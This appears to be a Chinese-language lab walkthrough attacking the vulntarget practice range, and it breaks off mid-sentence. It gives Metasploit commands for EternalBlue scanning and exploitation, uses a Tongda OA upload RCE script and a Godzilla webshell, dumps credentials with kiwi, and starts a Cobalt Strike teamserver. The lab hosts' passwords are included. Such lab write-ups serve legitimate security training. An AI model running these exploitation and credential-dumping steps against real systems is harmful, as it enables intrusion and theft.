攻击手段
通达OA未授权上传+文件包含RCE
Redis未授权写马
ms17-010永恒之蓝
代理转发内网跳板
CVE-2020-1472 域控杀器Zerologon
wmiexec/smbexec横向移动
cobalt strike与msf的shell传递
网络环境
靶场地址:https://github.com/crow821/vulntarget
攻击机
kali ip:192.168.1.11
web服务器(WIN7)
内网ip:10.0.20.98
外网ip:192.168.1.7
win7/admin
域主机(WIN2016)
内网1:10.0.20.99
内网2:10.0.10.111
Administrator/Admin@123、vulntarget.com\win2016/Admin#123
域控(WIN2019)
内网2:10.0.10.110
administrator/Admin@666
信息收集
端口扫描
nmap -A -sV 192.168.1.7
访问80端口,发现是通达OA
同时经nmap探测看见了熟悉的445端口,并存在永恒之蓝漏洞。如果只扫了端口也可以msf常规探测一波
msfconsole
查询利用模块
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.7
run
扫描出ms17-010永恒之蓝漏洞
漏洞利用
OA通达通用漏洞
永恒之蓝
利用这两个洞打一波
通达OA
去我搭建的Wiki文库看一下
存在的版本漏洞还是很多的
首先判断下通达OA的版本信息,有多个路径可以判断
http://192.168.1.7/inc/expired.php
http://192.168.1.7/inc/reg_trial.php
http://192.168.1.7/inc/reg_trial_submit.php
确定版本为11.3,可以利用未授权上传+文件包含RCE。
不想找了直接上脚本打。脚本在github上找的
获取cookie
一键利用
哥斯拉利用获得shell进行远控,得到的是system权限
永恒之蓝
因为之前探测到445端口确实存在永恒之蓝,msf利用 exploit/windows/smb/ms17_010_eternalblue直接打一下
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.7
run
成功拿到meterpreter
顺便抓一波密码 Win7-PC 密码为admin
load kiwi
creds_all
上线CS
准备上线cs,启动cs server
./teamserver 192.168.1.11 123456
连一下
启动监听器<